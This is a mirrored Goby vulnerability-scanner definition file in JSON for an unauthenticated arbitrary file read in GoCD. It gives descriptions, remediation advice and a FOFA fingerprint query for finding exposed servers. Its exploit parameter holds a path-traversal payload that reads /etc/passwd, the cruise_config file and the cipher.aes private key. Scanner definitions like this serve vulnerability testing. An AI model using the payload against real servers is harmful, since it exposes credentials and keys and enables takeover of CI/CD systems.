qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/GoCD-Arbitrary-File-Read.json

69 lines
3.6 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "GoCD Arbitrary File Read",
"Description": "<p>GoCD is a free and open source CI/CD server.</p><p>The lack of authentication in the GoCD/add-on/ path causes an attacker to read any file, including sensitive information such as the cruise_config server configuration file and the cipher.aes private key.</p>",
"Product": "GoCD",
"Homepage": "https://www.gocd.org",
"DisclosureDate": "2021-11-01",
"Author": "1291904552@qq.com",
"FofaQuery": "body=\"data-current-gocd-version\"",
"GobyQuery": "body=\"data-current-gocd-version\"",
"Level": "2",
"Impact": "<p>The lack of authentication in the GoCD/add-on/ path causes an attacker to read any file, including sensitive information such as the cruise_config server configuration file and the cipher.aes private key.</p>",
"Recommendation": "<p>The vendor has released a bug fix, please pay attention to the update in time: <a href=\"https://www.gocd.org\">https://www.gocd.org</a></p><p>1. Set access policies and whitelist access through security devices such as firewalls.</p><p>2.If not necessary, prohibit public network access to the system.</p>",
"Translation": {
"CN": {
"Name": "GoCD 服务任意文件读取漏洞",
"VulType": ["文件读取"],
"Tags": ["文件读取"],
"Description": "<p>GoCD是一款免费和开源的 CI/CD 服务。</p><p>GoCD/add-on/路径缺少身份验证导致攻击者可以读取任意文件包括cruise_config服务器配置文件和cipher.aes私有秘钥等敏感信息。</p>",
"Impact": "<p>GoCD/add-on/路径缺少身份验证导致攻击者可以读取任意文件包括cruise_config服务器配置文件和cipher.aes私有秘钥等敏感信息。</p>",
"Product": "GoCD",
"Recommendation": "<p>⼚商已发布了漏洞修复程序,请及时关注更新: <a href=\"https://www.gocd.org\">https://www.gocd.org</a></p><p>1、通过防⽕墙等安全设备设置访问策略设置⽩名单访问。</p><p>2、如⾮必要禁⽌公⽹访问该系统。</p>"
},
"EN": {
"Name": "GoCD Arbitrary File Read",
"VulType": ["fileread"],
"Tags": ["fileread"],
"Description": "<p>GoCD is a free and open source CI/CD server.</p><p>The lack of authentication in the GoCD/add-on/ path causes an attacker to read any file, including sensitive information such as the cruise_config server configuration file and the cipher.aes private key.</p>",
"Impact": "<p>The lack of authentication in the GoCD/add-on/ path causes an attacker to read any file, including sensitive information such as the cruise_config server configuration file and the cipher.aes private key.</p>",
"Product": "GoCD",
"Recommendation": "<p>The vendor has released a bug fix, please pay attention to the update in time: <a href=\"https://www.gocd.org\">https://www.gocd.org</a></p><p>1. Set access policies and whitelist access through security devices such as firewalls.</p><p>2.If not necessary, prohibit public network access to the system.</p>"
}
},
"References": [
"https://censys.io/blog/gocd-unauthenticated-takeover/"
],
"HasExp": true,
"ExpParams": [
{
"name": "filepath",
"type": "createSelect",
"value": "plugin?folderName=a&pluginName=/../../../../../../../../etc/passwd,cruise_config,cipher.aes"
}
],
"ExpTips": null,
"ScanSteps": null,
"Tags": [
"fileread"
],
"VulType": [
"fileread"
],
"CVEIDs": [
""
],
"CVSSScore": "9.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": ["GoCD"],
"System": null,
"Hardware": null
},
"CNNVD": [
""
],
"CNVD": [
""
]
}
Reference in New Issue View Git Blame Copy Permalink